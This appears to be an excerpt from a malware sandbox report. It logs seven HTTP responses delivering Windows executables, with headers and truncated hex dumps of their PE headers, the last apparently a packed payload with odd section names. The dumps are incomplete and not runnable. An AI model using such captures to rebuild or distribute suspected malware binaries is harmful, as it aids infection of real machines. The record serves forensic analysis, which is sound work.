Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 05:20:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 05:20:50 GMTContent-Type: application/octet-streamContent-Length: 1891840Last-Modified: Mon, 01 Jul 2024 03:45:22 GMTConnection: keep-aliveETag: "66822652-1cde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 11 21 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 22 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 63 6a 72 70 72 6d 65 00 d0 19 00 00 60 31 00 00 c6 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 63 7a 70 79 6a 77 79 00 10 00 00 00 30 4b 00 00 04 00 00 00 b8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 bc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
